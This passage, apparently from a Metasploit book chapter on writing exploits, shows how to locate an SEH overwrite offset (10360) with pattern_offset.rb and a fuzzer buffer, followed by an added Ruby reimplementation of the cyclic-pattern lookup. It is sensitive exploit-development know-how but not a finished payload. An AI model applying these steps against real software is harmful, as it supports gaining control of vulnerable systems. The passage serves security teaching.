
Creating Your Own Exploits


With the SEH overwritten with our random set of characters, we can use pattern_offset.rb in /opt/metasploit3/msf3/tools/ to determine exactly where the overwrite occurs by passing the characters of interest (684E3368) followed by the length of the string that was sent to the target (11000), as shown here:

root@bt:~/.msf3/modules/auxiliary/fuzzers# /opt/metasploit3/msf3/tools/pattern_offset.rb 684E3368 11000
10360

The value 10360 means that the four bytes that overwrite SEH are 10361, 10362, 10363, and 10364. We can now change the fuzzer code one last time to verify our findings:

print_status("Generating fuzzed data...")
fuzzed = "\x41" * 10360
fuzzed << "\x42" * 4
fuzzed << "\x43" * 636
print_status("Sending fuzzed data, buffer length = %d" % fuzzed.length)

As shown, the fuzzer will build the malicious request beginning with 10,360 As (hexadecimal 41), followed by four Bs (hexadecimal 42) to overwrite the SEH, and then 636 Cs (hexadecimal 43) as filler to keep the string length constant at 11,000 bytes.
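The pattern_offset.rb lookup above can be reproduced without Metasploit. The following is an added example, not the book's or Metasploit's own code; it assumes the standard "Aa0Aa1Aa2..." cyclic pattern that pattern_create.rb emits, and it searches the value both byte-reversed and as written, because an x86 debugger displays the SEH DWORD little-endian (684E3368 is the in-memory byte string "h3Nh").

```ruby
# Added example (not from the book or from Metasploit): a minimal Ruby
# reimplementation of pattern_create / pattern_offset, assuming the standard
# "Aa0Aa1Aa2..." cyclic pattern that Metasploit's tools generate.

UPPER = ('A'..'Z').to_a
LOWER = ('a'..'z').to_a
DIGIT = ('0'..'9').to_a

# Build the cyclic pattern: every upper/lower/digit triple is unique, so any
# 4-byte window identifies a single position in the buffer.
def pattern_create(length)
  buf = String.new
  UPPER.each do |u|
    LOWER.each do |l|
      DIGIT.each do |d|
        buf << u << l << d
        return buf[0, length] if buf.length >= length
      end
    end
  end
  buf[0, length]
end

# Locate a 4-byte value seen in a register or the SEH slot. The value is
# searched byte-reversed first: an x86 debugger shows the DWORD little-endian,
# so 684E3368 corresponds to the bytes "h3Nh" as they sit in memory.
# Returns nil when the value is not part of the pattern (e.g. plain "AAAA").
def pattern_offset(hex_value, length)
  pattern = pattern_create(length)
  bytes = [hex_value].pack('H*')          # "684E3368" -> "hN3h"
  [bytes.reverse, bytes].each do |needle|
    idx = pattern.index(needle)
    return idx if idx
  end
  nil
end

if __FILE__ == $PROGRAM_NAME
  puts pattern_offset('684E3368', 11000)  # => 10360
end
```

The result matches the tool output above: the SEH bytes begin 10,360 bytes into the 11,000-byte pattern.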

Running the fuzzer against the target again shows that the entire SEH chain is under your complete control, as shown in Figure 14-4.

Figure 14-4: SEH fully controlled